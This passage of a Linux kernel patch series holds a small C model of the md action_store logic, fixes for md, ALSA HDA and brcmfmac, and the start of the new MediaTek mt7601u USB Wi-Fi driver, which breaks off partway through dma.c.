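    } else if (strcmp(cmd, "reshape") == 0) {
        pthread_mutex_lock(&mddev_lock);
        recovery &= ~FROZEN;          /* cleared under the lock... */
        /* ...so start_reshape() runs before the md thread can act */
        pthread_mutex_unlock(&mddev_lock);
    } else if (strcmp(cmd, "resync") == 0 || strcmp(cmd, "recover") == 0) {
        recovery &= ~FROZEN;          /* cleared per recognised command */
    }
    /* unknown commands leave FROZEN untouched */
}

int main(void)
{
    action_store("bogus");
    printf("after bogus: %#lx\n", recovery);    /* still frozen */
    action_store("reshape");
    printf("after reshape: %#lx\n", recovery);  /* 0x0 */
    return 0;
}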
Signed-off-by: NeilBrown Fixes: 6791875e2e53 ("md: make reconfig_mutex optional for writes to md sysfs files.") --- drivers/md/md.c | 14 ++++++++------ 1 file changed, 8 insertions(+), 6 deletions(-) diff --git a/drivers/md/md.c b/drivers/md/md.c index d4f31e195e26..8f10f4ea70ea 100644 --- a/drivers/md/md.c +++ b/drivers/md/md.c @@ -4211,12 +4211,12 @@ action_store(struct mddev *mddev, const char *page, size_t len) if (!mddev->pers || !mddev->pers->sync_request) return -EINVAL; - if (cmd_match(page, "frozen")) - set_bit(MD_RECOVERY_FROZEN, &mddev->recovery); - else - clear_bit(MD_RECOVERY_FROZEN, &mddev->recovery); if (cmd_match(page, "idle") || cmd_match(page, "frozen")) { + if (cmd_match(page, "frozen")) + set_bit(MD_RECOVERY_FROZEN, &mddev->recovery); + else + clear_bit(MD_RECOVERY_FROZEN, &mddev->recovery); flush_workqueue(md_misc_wq); if (mddev->sync_thread) { set_bit(MD_RECOVERY_INTR, &mddev->recovery); @@ -4229,16 +4229,17 @@ action_store(struct mddev *mddev, const char *page, size_t len) test_bit(MD_RECOVERY_NEEDED, &mddev->recovery)) return -EBUSY; else if (cmd_match(page, "resync")) - set_bit(MD_RECOVERY_NEEDED, &mddev->recovery); + clear_bit(MD_RECOVERY_FROZEN, &mddev->recovery); else if (cmd_match(page, "recover")) { + clear_bit(MD_RECOVERY_FROZEN, &mddev->recovery); set_bit(MD_RECOVERY_RECOVER, &mddev->recovery); - set_bit(MD_RECOVERY_NEEDED, &mddev->recovery); } else if (cmd_match(page, "reshape")) { int err; if (mddev->pers->start_reshape == NULL) return -EINVAL; err = mddev_lock(mddev); if (!err) { + clear_bit(MD_RECOVERY_FROZEN, &mddev->recovery); err = mddev->pers->start_reshape(mddev); mddev_unlock(mddev); } @@ -4250,6 +4251,7 @@ action_store(struct mddev *mddev, const char *page, size_t len) set_bit(MD_RECOVERY_CHECK, &mddev->recovery); else if (!cmd_match(page, "repair")) return -EINVAL; + clear_bit(MD_RECOVERY_FROZEN, &mddev->recovery); set_bit(MD_RECOVERY_REQUESTED, &mddev->recovery); set_bit(MD_RECOVERY_SYNC, &mddev->recovery); } From b40eda6408e94ee286cb5720cd3f409f70e01778 Mon Sep 17 00:00:00 2001 From: David Henningsson Date: Thu, 28 May 2015 09:40:23 +0200 Subject: [PATCH 347/872] ALSA: hda - Disable Headphone Mic boost for ALC662 When headphone mic boost is above zero, some 10 - 20 second delay might occur before the headphone mic is operational. Therefore disable the headphone mic boost control (recording gain is sufficient even without it). (Note: this patch is not about the headset mic, it's about the less common mic-in only mode.) BugLink: https://bugs.launchpad.net/bugs/1454235 Suggested-by: Kailang Yang Signed-off-by: David Henningsson Signed-off-by: Takashi Iwai --- sound/pci/hda/patch_realtek.c | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c index e3bf72bb278c..ea3af38eee58 100644 --- a/sound/pci/hda/patch_realtek.c +++ b/sound/pci/hda/patch_realtek.c @@ -4228,6 +4228,11 @@ static void alc_fixup_headset_mode_alc662(struct hda_codec *codec, if (action == HDA_FIXUP_ACT_PRE_PROBE) { spec->parse_flags |= HDA_PINCFG_HEADSET_MIC; spec->gen.hp_mic = 1; /* Mic-in is same pin as headphone */ + + /* Disable boost for mic-in permanently. (This code is only called + from quirks that guarantee that the headphone is at NID 0x1b.) 
*/ + snd_hda_codec_write(codec, 0x1b, 0, AC_VERB_SET_AMP_GAIN_MUTE, 0x7000); + snd_hda_override_wcaps(codec, 0x1b, get_wcaps(codec, 0x1b) & ~AC_WCAP_IN_AMP); } else alc_fixup_headset_mode(codec, fix, action); } From 00e27eeb75bb91798225cfb1ab9f6b9e13d3d639 Mon Sep 17 00:00:00 2001 From: Arend van Spriel Date: Wed, 27 May 2015 19:31:41 +0200 Subject: [PATCH 348/872] brcmfmac: fix invalid access to struct acpi_device fields The fields of struct acpi_device are only known when CONFIG_ACPI is defined. Fix this by using a helper function. This will resolve the issue found in linux-next: ../brcmfmac/bcmsdh.c: In function 'brcmf_ops_sdio_probe': ../brcmfmac/bcmsdh.c:1139:7: error: dereferencing pointer to incomplete type adev->flags.power_manageable = 0; ^ Fixes: f0992ace680c ("brcmfmac: prohibit ACPI power management ...") Cc: Fu, Zhonghui Reported-by: Stephen Rothwell Signed-off-by: Arend van Spriel Signed-off-by: Kalle Valo --- .../net/wireless/brcm80211/brcmfmac/bcmsdh.c | 19 ++++++++++++++----- 1 file changed, 14 insertions(+), 5 deletions(-) diff --git a/drivers/net/wireless/brcm80211/brcmfmac/bcmsdh.c b/drivers/net/wireless/brcm80211/brcmfmac/bcmsdh.c index b0d0ff5d82c0..71779b9e4bbe 100644 --- a/drivers/net/wireless/brcm80211/brcmfmac/bcmsdh.c +++ b/drivers/net/wireless/brcm80211/brcmfmac/bcmsdh.c @@ -1117,6 +1117,18 @@ MODULE_DEVICE_TABLE(sdio, brcmf_sdmmc_ids); static struct brcmfmac_sdio_platform_data *brcmfmac_sdio_pdata; +static void brcmf_sdiod_acpi_set_power_manageable(struct device *dev, + int val) +{ +#if IS_ENABLED(CONFIG_ACPI) + struct acpi_device *adev; + + adev = ACPI_COMPANION(dev); + if (adev) + adev->flags.power_manageable = 0; +#endif +} + static int brcmf_ops_sdio_probe(struct sdio_func *func, const struct sdio_device_id *id) { @@ -1124,7 +1136,6 @@ static int brcmf_ops_sdio_probe(struct sdio_func *func, struct brcmf_sdio_dev *sdiodev; struct brcmf_bus *bus_if; struct device *dev; - struct acpi_device *adev; brcmf_dbg(SDIO, "Enter\n"); brcmf_dbg(SDIO, "Class=%x\n", func->class); @@ -1132,11 +1143,9 @@ static int brcmf_ops_sdio_probe(struct sdio_func *func, brcmf_dbg(SDIO, "sdio device ID: 0x%04x\n", func->device); brcmf_dbg(SDIO, "Function#: %d\n", func->num); - /* prohibit ACPI power management for this device */ dev = &func->dev; - adev = ACPI_COMPANION(dev); - if (adev) - adev->flags.power_manageable = 0; + /* prohibit ACPI power management for this device */ + brcmf_sdiod_acpi_set_power_manageable(dev, 0); /* Consume func num 1 but dont do anything with it. */ if (func->num == 1) From c869f77d6abb5d5f9f2f1a661d5c53862a9cad34 Mon Sep 17 00:00:00 2001 From: Jakub Kicinski Date: Tue, 26 May 2015 11:16:00 +0200 Subject: [PATCH 349/872] add mt7601u driver Add support for the simplest of MediaTek Wi-Fi devices - MT7601U. It is a single stream bgn chip with no bells or whistles. This driver is partially based on Felix's mt76 but IMHO it doesn't make sense to merge the two right now because MT7601U is a design somewhere between old Ralink devices and new Mediatek chips. There wouldn't be all that much code sharing with the devices mt76 supports. The situation may obviously change when someone decides to extend mt76 with support for the more recent USB dongles. The driver supports only station mode. I'm hoping to add AP support when time allows.
This driver sat on GitHub for quite a while and got some testing there: http://github.com/kuba-moo/mt7601u Signed-off-by: Jakub Kicinski Signed-off-by: Kalle Valo --- MAINTAINERS | 6 + drivers/net/wireless/Kconfig | 1 + drivers/net/wireless/Makefile | 2 + drivers/net/wireless/mediatek/Kconfig | 10 + drivers/net/wireless/mediatek/Makefile | 1 + drivers/net/wireless/mediatek/mt7601u/Kconfig | 6 + .../net/wireless/mediatek/mt7601u/Makefile | 9 + drivers/net/wireless/mediatek/mt7601u/core.c | 78 + .../net/wireless/mediatek/mt7601u/debugfs.c | 172 +++ drivers/net/wireless/mediatek/mt7601u/dma.c | 533 +++++++ drivers/net/wireless/mediatek/mt7601u/dma.h | 127 ++ .../net/wireless/mediatek/mt7601u/eeprom.c | 414 ++++++ .../net/wireless/mediatek/mt7601u/eeprom.h | 151 ++ drivers/net/wireless/mediatek/mt7601u/init.c | 625 ++++++++ .../net/wireless/mediatek/mt7601u/initvals.h | 164 +++ .../wireless/mediatek/mt7601u/initvals_phy.h | 291 ++++ drivers/net/wireless/mediatek/mt7601u/mac.c | 569 ++++++++ drivers/net/wireless/mediatek/mt7601u/mac.h | 178 +++ drivers/net/wireless/mediatek/mt7601u/main.c | 412 ++++++ drivers/net/wireless/mediatek/mt7601u/mcu.c | 534 +++++++ drivers/net/wireless/mediatek/mt7601u/mcu.h | 94 ++ .../net/wireless/mediatek/mt7601u/mt7601u.h | 390 +++++ drivers/net/wireless/mediatek/mt7601u/phy.c | 1251 +++++++++++++++++ drivers/net/wireless/mediatek/mt7601u/regs.h | 636 +++++++++ drivers/net/wireless/mediatek/mt7601u/trace.c | 21 + drivers/net/wireless/mediatek/mt7601u/trace.h | 400 ++++++ drivers/net/wireless/mediatek/mt7601u/tx.c | 319 +++++ drivers/net/wireless/mediatek/mt7601u/usb.c | 360 +++++ drivers/net/wireless/mediatek/mt7601u/usb.h | 77 + drivers/net/wireless/mediatek/mt7601u/util.c | 42 + drivers/net/wireless/mediatek/mt7601u/util.h | 77 + 31 files changed, 7950 insertions(+) create mode 100644 drivers/net/wireless/mediatek/Kconfig create mode 100644 drivers/net/wireless/mediatek/Makefile create mode 100644 drivers/net/wireless/mediatek/mt7601u/Kconfig create mode 100644 drivers/net/wireless/mediatek/mt7601u/Makefile create mode 100644 drivers/net/wireless/mediatek/mt7601u/core.c create mode 100644 drivers/net/wireless/mediatek/mt7601u/debugfs.c create mode 100644 drivers/net/wireless/mediatek/mt7601u/dma.c create mode 100644 drivers/net/wireless/mediatek/mt7601u/dma.h create mode 100644 drivers/net/wireless/mediatek/mt7601u/eeprom.c create mode 100644 drivers/net/wireless/mediatek/mt7601u/eeprom.h create mode 100644 drivers/net/wireless/mediatek/mt7601u/init.c create mode 100644 drivers/net/wireless/mediatek/mt7601u/initvals.h create mode 100644 drivers/net/wireless/mediatek/mt7601u/initvals_phy.h create mode 100644 drivers/net/wireless/mediatek/mt7601u/mac.c create mode 100644 drivers/net/wireless/mediatek/mt7601u/mac.h create mode 100644 drivers/net/wireless/mediatek/mt7601u/main.c create mode 100644 drivers/net/wireless/mediatek/mt7601u/mcu.c create mode 100644 drivers/net/wireless/mediatek/mt7601u/mcu.h create mode 100644 drivers/net/wireless/mediatek/mt7601u/mt7601u.h create mode 100644 drivers/net/wireless/mediatek/mt7601u/phy.c create mode 100644 drivers/net/wireless/mediatek/mt7601u/regs.h create mode 100644 drivers/net/wireless/mediatek/mt7601u/trace.c create mode 100644 drivers/net/wireless/mediatek/mt7601u/trace.h create mode 100644 drivers/net/wireless/mediatek/mt7601u/tx.c create mode 100644 drivers/net/wireless/mediatek/mt7601u/usb.c create mode 100644 drivers/net/wireless/mediatek/mt7601u/usb.h create mode 100644 
drivers/net/wireless/mediatek/mt7601u/util.c create mode 100644 drivers/net/wireless/mediatek/mt7601u/util.h diff --git a/MAINTAINERS b/MAINTAINERS index df106f87a3ba..c6f4576efd56 100644 --- a/MAINTAINERS +++ b/MAINTAINERS @@ -6365,6 +6365,12 @@ F: include/uapi/linux/meye.h F: include/uapi/linux/ivtv* F: include/uapi/linux/uvcvideo.h +MEDIATEK MT7601U WIRELESS LAN DRIVER +M: Jakub Kicinski +L: linux-wireless@vger.kernel.org +S: Maintained +F: drivers/net/wireless/mediatek/mt7601u/ + MEGARAID SCSI/SAS DRIVERS M: Kashyap Desai M: Sumit Saxena diff --git a/drivers/net/wireless/Kconfig b/drivers/net/wireless/Kconfig index 16604bdf5197..a63ab2e83105 100644 --- a/drivers/net/wireless/Kconfig +++ b/drivers/net/wireless/Kconfig @@ -277,6 +277,7 @@ source "drivers/net/wireless/libertas/Kconfig" source "drivers/net/wireless/orinoco/Kconfig" source "drivers/net/wireless/p54/Kconfig" source "drivers/net/wireless/rt2x00/Kconfig" +source "drivers/net/wireless/mediatek/Kconfig" source "drivers/net/wireless/rtlwifi/Kconfig" source "drivers/net/wireless/ti/Kconfig" source "drivers/net/wireless/zd1211rw/Kconfig" diff --git a/drivers/net/wireless/Makefile b/drivers/net/wireless/Makefile index 0c8891686718..6b9e729dd8ac 100644 --- a/drivers/net/wireless/Makefile +++ b/drivers/net/wireless/Makefile @@ -45,6 +45,8 @@ obj-$(CONFIG_IWLWIFI) += iwlwifi/ obj-$(CONFIG_IWLEGACY) += iwlegacy/ obj-$(CONFIG_RT2X00) += rt2x00/ +obj-$(CONFIG_WL_MEDIATEK) += mediatek/ + obj-$(CONFIG_P54_COMMON) += p54/ obj-$(CONFIG_ATH_CARDS) += ath/ diff --git a/drivers/net/wireless/mediatek/Kconfig b/drivers/net/wireless/mediatek/Kconfig new file mode 100644 index 000000000000..cba300c6b5da --- /dev/null +++ b/drivers/net/wireless/mediatek/Kconfig @@ -0,0 +1,10 @@ +menuconfig WL_MEDIATEK + bool "Mediatek Wireless LAN support" + ---help--- + Enable community drivers for MediaTek WiFi devices. + Those drivers make use of the Linux mac80211 stack. + + +if WL_MEDIATEK +source "drivers/net/wireless/mediatek/mt7601u/Kconfig" +endif # WL_MEDIATEK diff --git a/drivers/net/wireless/mediatek/Makefile b/drivers/net/wireless/mediatek/Makefile new file mode 100644 index 000000000000..9d5f182fd7fd --- /dev/null +++ b/drivers/net/wireless/mediatek/Makefile @@ -0,0 +1 @@ +obj-$(CONFIG_MT7601U) += mt7601u/ diff --git a/drivers/net/wireless/mediatek/mt7601u/Kconfig b/drivers/net/wireless/mediatek/mt7601u/Kconfig new file mode 100644 index 000000000000..f46bed92796b --- /dev/null +++ b/drivers/net/wireless/mediatek/mt7601u/Kconfig @@ -0,0 +1,6 @@ +config MT7601U + tristate "MediaTek MT7601U (USB) support" + depends on MAC80211 + depends on USB + ---help--- + This adds support for MT7601U-based wireless USB dongles. 
diff --git a/drivers/net/wireless/mediatek/mt7601u/Makefile b/drivers/net/wireless/mediatek/mt7601u/Makefile new file mode 100644 index 000000000000..ea9ed8a5db4d --- /dev/null +++ b/drivers/net/wireless/mediatek/mt7601u/Makefile @@ -0,0 +1,9 @@ +ccflags-y += -D__CHECK_ENDIAN__ + +obj-$(CONFIG_MT7601U) += mt7601u.o + +mt7601u-objs = \ + usb.o init.o main.o mcu.o trace.o dma.o core.o eeprom.o phy.o \ + mac.o util.o debugfs.o tx.o + +CFLAGS_trace.o := -I$(src) diff --git a/drivers/net/wireless/mediatek/mt7601u/core.c b/drivers/net/wireless/mediatek/mt7601u/core.c new file mode 100644 index 000000000000..0aabd790f985 --- /dev/null +++ b/drivers/net/wireless/mediatek/mt7601u/core.c @@ -0,0 +1,78 @@ +/* + * Copyright (C) 2014 Felix Fietkau + * Copyright (C) 2015 Jakub Kicinski + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License version 2 + * as published by the Free Software Foundation + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + */ + +#include "mt7601u.h" + +int mt7601u_wait_asic_ready(struct mt7601u_dev *dev) +{ + int i = 100; + u32 val; + + do { + if (test_bit(MT7601U_STATE_REMOVED, &dev->state)) + return -EIO; + + val = mt7601u_rr(dev, MT_MAC_CSR0); + if (val && ~val) + return 0; + + udelay(10); + } while (i--); + + return -EIO; +} + +bool mt76_poll(struct mt7601u_dev *dev, u32 offset, u32 mask, u32 val, + int timeout) +{ + u32 cur; + + timeout /= 10; + do { + if (test_bit(MT7601U_STATE_REMOVED, &dev->state)) + return false; + + cur = mt7601u_rr(dev, offset) & mask; + if (cur == val) + return true; + + udelay(10); + } while (timeout-- > 0); + + dev_err(dev->dev, "Error: Time out with reg %08x\n", offset); + + return false; +} + +bool mt76_poll_msec(struct mt7601u_dev *dev, u32 offset, u32 mask, u32 val, + int timeout) +{ + u32 cur; + + timeout /= 10; + do { + if (test_bit(MT7601U_STATE_REMOVED, &dev->state)) + return false; + + cur = mt7601u_rr(dev, offset) & mask; + if (cur == val) + return true; + + msleep(10); + } while (timeout-- > 0); + + dev_err(dev->dev, "Error: Time out with reg %08x\n", offset); + + return false; +} diff --git a/drivers/net/wireless/mediatek/mt7601u/debugfs.c b/drivers/net/wireless/mediatek/mt7601u/debugfs.c new file mode 100644 index 000000000000..fc008475a03b --- /dev/null +++ b/drivers/net/wireless/mediatek/mt7601u/debugfs.c @@ -0,0 +1,172 @@ +/* + * Copyright (C) 2014 Felix Fietkau + * Copyright (C) 2015 Jakub Kicinski + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License version 2 + * as published by the Free Software Foundation + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. 
+ */ + +#include + +#include "mt7601u.h" +#include "eeprom.h" + +static int +mt76_reg_set(void *data, u64 val) +{ + struct mt7601u_dev *dev = data; + + mt76_wr(dev, dev->debugfs_reg, val); + return 0; +} + +static int +mt76_reg_get(void *data, u64 *val) +{ + struct mt7601u_dev *dev = data; + + *val = mt76_rr(dev, dev->debugfs_reg); + return 0; +} + +DEFINE_SIMPLE_ATTRIBUTE(fops_regval, mt76_reg_get, mt76_reg_set, "0x%08llx\n"); + +static int +mt7601u_ampdu_stat_read(struct seq_file *file, void *data) +{ + struct mt7601u_dev *dev = file->private; + int i, j; + +#define stat_printf(grp, off, name) \ + seq_printf(file, #name ":\t%llu\n", dev->stats.grp[off]) + + stat_printf(rx_stat, 0, rx_crc_err); + stat_printf(rx_stat, 1, rx_phy_err); + stat_printf(rx_stat, 2, rx_false_cca); + stat_printf(rx_stat, 3, rx_plcp_err); + stat_printf(rx_stat, 4, rx_fifo_overflow); + stat_printf(rx_stat, 5, rx_duplicate); + + stat_printf(tx_stat, 0, tx_fail_cnt); + stat_printf(tx_stat, 1, tx_bcn_cnt); + stat_printf(tx_stat, 2, tx_success); + stat_printf(tx_stat, 3, tx_retransmit); + stat_printf(tx_stat, 4, tx_zero_len); + stat_printf(tx_stat, 5, tx_underflow); + + stat_printf(aggr_stat, 0, non_aggr_tx); + stat_printf(aggr_stat, 1, aggr_tx); + + stat_printf(zero_len_del, 0, tx_zero_len_del); + stat_printf(zero_len_del, 1, rx_zero_len_del); +#undef stat_printf + + seq_puts(file, "Aggregations stats:\n"); + for (i = 0; i < 4; i++) { + for (j = 0; j < 8; j++) + seq_printf(file, "%08llx ", + dev->stats.aggr_n[i * 8 + j]); + seq_putc(file, '\n'); + } + + seq_printf(file, "recent average AMPDU len: %d\n", + atomic_read(&dev->avg_ampdu_len)); + + return 0; +} + +static int +mt7601u_ampdu_stat_open(struct inode *inode, struct file *f) +{ + return single_open(f, mt7601u_ampdu_stat_read, inode->i_private); +} + +static const struct file_operations fops_ampdu_stat = { + .open = mt7601u_ampdu_stat_open, + .read = seq_read, + .llseek = seq_lseek, + .release = single_release, +}; + +static int +mt7601u_eeprom_param_read(struct seq_file *file, void *data) +{ + struct mt7601u_dev *dev = file->private; + struct mt7601u_rate_power *rp = &dev->ee->power_rate_table; + struct tssi_data *td = &dev->ee->tssi_data; + int i; + + seq_printf(file, "RF freq offset: %hhx\n", dev->ee->rf_freq_off); + seq_printf(file, "RSSI offset: %hhx %hhx\n", + dev->ee->rssi_offset[0], dev->ee->rssi_offset[1]); + seq_printf(file, "Reference temp: %hhx\n", dev->ee->ref_temp); + seq_printf(file, "LNA gain: %hhx\n", dev->ee->lna_gain); + seq_printf(file, "Reg channels: %hhu-%hhu\n", dev->ee->reg.start, + dev->ee->reg.start + dev->ee->reg.num - 1); + + seq_puts(file, "Per rate power:\n"); + for (i = 0; i < 2; i++) + seq_printf(file, "\t raw:%02hhx bw20:%02hhx bw40:%02hhx\n", + rp->cck[i].raw, rp->cck[i].bw20, rp->cck[i].bw40); + for (i = 0; i < 4; i++) + seq_printf(file, "\t raw:%02hhx bw20:%02hhx bw40:%02hhx\n", + rp->ofdm[i].raw, rp->ofdm[i].bw20, rp->ofdm[i].bw40); + for (i = 0; i < 4; i++) + seq_printf(file, "\t raw:%02hhx bw20:%02hhx bw40:%02hhx\n", + rp->ht[i].raw, rp->ht[i].bw20, rp->ht[i].bw40); + + seq_puts(file, "Per channel power:\n"); + for (i = 0; i < 7; i++) + seq_printf(file, "\t tx_power ch%u:%02hhx ch%u:%02hhx\n", + i * 2 + 1, dev->ee->chan_pwr[i * 2], + i * 2 + 2, dev->ee->chan_pwr[i * 2 + 1]); + + if (!dev->ee->tssi_enabled) + return 0; + + seq_puts(file, "TSSI:\n"); + seq_printf(file, "\t slope:%02hhx\n", td->slope); + seq_printf(file, "\t offset=%02hhx %02hhx %02hhx\n", + td->offset[0], td->offset[1], td->offset[2]); + seq_printf(file, "\t 
delta_off:%08x\n", td->tx0_delta_offset); + + return 0; +} + +static int +mt7601u_eeprom_param_open(struct inode *inode, struct file *f) +{ + return single_open(f, mt7601u_eeprom_param_read, inode->i_private); +} + +static const struct file_operations fops_eeprom_param = { + .open = mt7601u_eeprom_param_open, + .read = seq_read, + .llseek = seq_lseek, + .release = single_release, +}; + +void mt7601u_init_debugfs(struct mt7601u_dev *dev) +{ + struct dentry *dir; + + dir = debugfs_create_dir("mt7601u", dev->hw->wiphy->debugfsdir); + if (!dir) + return; + + debugfs_create_u8("temperature", S_IRUSR, dir, &dev->raw_temp); + debugfs_create_u32("temp_mode", S_IRUSR, dir, &dev->temp_mode); + + debugfs_create_u32("regidx", S_IRUSR | S_IWUSR, dir, &dev->debugfs_reg); + debugfs_create_file("regval", S_IRUSR | S_IWUSR, dir, dev, + &fops_regval); + debugfs_create_file("ampdu_stat", S_IRUSR, dir, dev, &fops_ampdu_stat); + debugfs_create_file("eeprom_param", S_IRUSR, dir, dev, + &fops_eeprom_param); +} diff --git a/drivers/net/wireless/mediatek/mt7601u/dma.c b/drivers/net/wireless/mediatek/mt7601u/dma.c new file mode 100644 index 000000000000..9c9e1288644b --- /dev/null +++ b/drivers/net/wireless/mediatek/mt7601u/dma.c @@ -0,0 +1,533 @@ +/* + * Copyright (C) 2015 Jakub Kicinski + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License version 2 + * as published by the Free Software Foundation + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + */ + +#include "mt7601u.h" +#include "dma.h" +#include "usb.h" +#include "trace.h" + +static int mt7601u_submit_rx_buf(struct mt7601u_dev *dev, + struct mt7601u_dma_buf_rx *e, gfp_t gfp); + +static unsigned int ieee80211_get_hdrlen_from_buf(const u8 *data, unsigned len) +{ + const struct ieee80211_hdr *hdr = (const struct ieee80211_hdr *)data; + unsigned int hdrlen; + + if (unlikely(len < 10)) + return 0; + hdrlen = ieee80211_hdrlen(hdr->frame_control); + if (unlikely(hdrlen > len)) + return 0; + return hdrlen; +} + +static struct sk_buff * +mt7601u_rx_skb_from_seg(struct mt7601u_dev *dev, struct mt7601u_rxwi *rxwi, + u8 *data, u32 seg_len) +{ + struct sk_buff *skb; + u32 true_len; + + if (rxwi->rxinfo & cpu_to_le32(MT_RXINFO_L2PAD)) + seg_len -= 2; + + skb = alloc_skb(seg_len, GFP_ATOMIC); + if (!skb) + return NULL; + + if (rxwi->rxinfo & cpu_to_le32(MT_RXINFO_L2PAD)) { + int hdr_len = ieee80211_get_hdrlen_from_buf(data, seg_len); + + memcpy(skb_put(skb, hdr_len), data, hdr_len); + data += hdr_len + 2; + seg_len -= hdr_len; + } + + memcpy(skb_put(skb, seg_len), data, seg_len); + + true_len = mt76_mac_process_rx(dev, skb, skb->data, rxwi); + skb_trim(skb, true_len); + + return skb; +} + +static struct sk_buff * +mt7601u_rx_skb_from_seg_paged(struct mt7601u_dev *dev, + struct mt7601u_rxwi *rxwi, void *data, + u32 seg_len, u32 truesize, struct page *p) +{ + unsigned int hdr_len = ieee80211_get_hdrlen_from_buf(data, seg_len); + unsigned int true_len, copy, frag; + struct sk_buff *skb; + + skb = alloc_skb(128, GFP_ATOMIC); + if (!skb) + return NULL; + + true_len = mt76_mac_process_rx(dev, skb, data, rxwi); + + if (rxwi->rxinfo & cpu_to_le32(MT_RXINFO_L2PAD)) { + memcpy(skb_put(skb, hdr_len), data, hdr_len); + data += hdr_len + 2; + true_len -= hdr_len; + hdr_len = 0; + } + + copy = (true_len <= 
skb_tailroom(skb)) ? true_len : hdr_len + 8; + frag = true_len - copy; + + memcpy(skb_put(skb, copy), data, copy); + data += copy; + + if (frag) { + skb_add_rx_frag(skb, 0, p, data - page_address(p), + frag, truesize); + get_page(p); + } + + return skb; +} + +static void mt7601u_rx_process_seg(struct mt7601u_dev *dev, u8 *data, + u32 seg_len, struct page *p, bool paged) +{ + struct sk_buff *skb; + struct mt7601u_rxwi *rxwi; + u32 fce_info, truesize = seg_len; + + /* DMA_INFO field at the beginning of the segment contains only some of + * the information, we need to read the FCE descriptor from the end. + */ + fce_info = get_unaligned_le32(data + seg_len - MT_FCE_INFO_LEN); + seg_len -= MT_FCE_INFO_LEN; + + data += MT_DMA_HDR_LEN; + seg_len -= MT_DMA_HDR_LEN; + + rxwi = (struct mt7601u_rxwi *) data; + data += sizeof(struct mt7601u_rxwi); + seg_len -= sizeof(struct mt7601u_rxwi); + + if (unlikely(rxwi->zero[0] || rxwi->zero[1] || rxwi->zero[2])) + dev_err_once(dev->dev, "Error: RXWI zero fields are set\n"); + if (unlikely(MT76_GET(MT_RXD_INFO_TYPE, fce_info))) + dev_err_once(dev->dev, "Error: RX path seen a non-pkt urb\n"); + + trace_mt_rx(dev, rxwi, fce_info); + + if (paged) + skb = mt7601u_rx_skb_from_seg_paged(dev, rxwi, data, seg_len, + truesize, p); + else + skb = mt7601u_rx_skb_from_seg(dev, rxwi, data, seg_len); + if (!skb) + return; + + ieee80211_rx_ni(dev->hw, skb); +} + +static u16 mt7601u_rx_next_seg_len(u8 *data, u32 data_len) +{ + u32 min_seg_len = MT_DMA_HDR_LEN + MT_RX_INFO_LEN + + sizeof(struct mt7601u_rxwi) + MT_FCE_INFO_LEN; + u16 dma_len = get_unaligned_le16(data); + + if (data_len < min_seg_len || + WARN_ON(!dma_len) || + WARN_ON(dma_len + MT_DMA_HDRS > data_len) || + WARN_ON(dma_len & 0x3)) + return 0; + + return MT_DMA_HDRS + dma_len; +} + +static void +mt7601u_rx_process_entry(struct mt7601u_dev *dev, struct mt7601u_dma_buf_rx *e) +{ + u32 seg_len, data_len = e->urb->actual_length; + u8 *data = page_address(e->p); + struct page *new_p = NULL; + bool paged = true; + int cnt = 0; + + if (!test_bit(MT7601U_STATE_INITIALIZED, &dev->state)) + return; + + /* Copy if there is very little data in the buffer. 
*/ + if (data_len < 512) { + paged = false; + } else { + new_p = dev_alloc_pages(MT_RX_ORDER); + if (!new_p) + paged = false; + } + + while ((seg_len = mt7601u_rx_next_seg_len(data, data_len))) { + mt7601u_rx_process_seg(dev, data, seg_len, e->p, paged); + + data_len -= seg_len; + data += seg_len; + cnt++; + } + + if (cnt > 1) + trace_mt_rx_dma_aggr(dev, cnt, paged); + + if (paged) { + /* we have one extra ref from the allocator */ + __free_pages(e->p, MT_RX_ORDER); + + e->p = new_p; + } +} + +static struct mt7601u_dma_buf_rx * +mt7601u_rx_get_pending_entry(struct mt7601u_dev *dev) +{ + struct mt7601u_rx_queue *q = &dev->rx_q; + struct mt7601u_dma_buf_rx *buf = NULL; + unsigned long flags; + + spin_lock_irqsave(&dev->rx_lock, flags); + + if (!q->pending) + goto out; + + buf = &q->e[q->start]; + q->pending--; + q->start = (q->start + 1) % q->entries; +out: + spin_unlock_irqrestore(&dev->rx_lock, flags); + + return buf; +} + +static void mt7601u_complete_rx(struct urb *urb) +{ + struct mt7601u_dev *dev = urb->context; + struct mt7601u_rx_queue *q = &dev->rx_q; + unsigned long flags; + + spin_lock_irqsave(&dev->rx_lock, flags); + + if (mt7601u_urb_has_error(urb)) + dev_err(dev->dev, "Error: RX urb failed:%d\n", urb->status); + if (WARN_ONCE(q->e[q->end].urb != urb, "RX urb mismatch")) + goto out; + + q->end = (q->end + 1) % q->entries; + q->pending++; + tasklet_schedule(&dev->rx_tasklet); +out: + spin_unlock_irqrestore(&dev->rx_lock, flags); +} + +static void mt7601u_rx_tasklet(unsigned long data) +{ + struct mt7601u_dev *dev = (struct mt7601u_dev *) data; + struct mt7601u_dma_buf_rx *e; + + while ((e = mt7601u_rx_get_pending_entry(dev))) { + if (e->urb->status) + continue; + + mt7601u_rx_process_entry(dev, e); + mt7601u_submit_rx_buf(dev, e, GFP_ATOMIC); + } +} + +static void mt7601u_complete_tx(struct urb *urb) +{ + struct mt7601u_tx_queue *q = urb->context; + struct mt7601u_dev *dev = q->dev; + struct sk_buff *skb; + unsigned long flags; + + spin_lock_irqsave(&dev->tx_lock, flags); + + if (mt7601u_urb_has_error(urb)) + dev_err(dev->dev, "Error: TX urb failed:%d\n", urb->status); + if (WARN_ONCE(q->e[q->start].urb != urb, "TX urb mismatch")) + goto out; + + skb = q->e[q->start].skb; + trace_mt_tx_dma_done(dev, skb); + + mt7601u_tx_status(dev, skb); + + if (q->used == q->entries - q->entries / 8) + ieee80211_wake_queue(dev->hw, skb_get_queue_mapping(skb)); + + q->start = (q->start + 1) % q->entries; 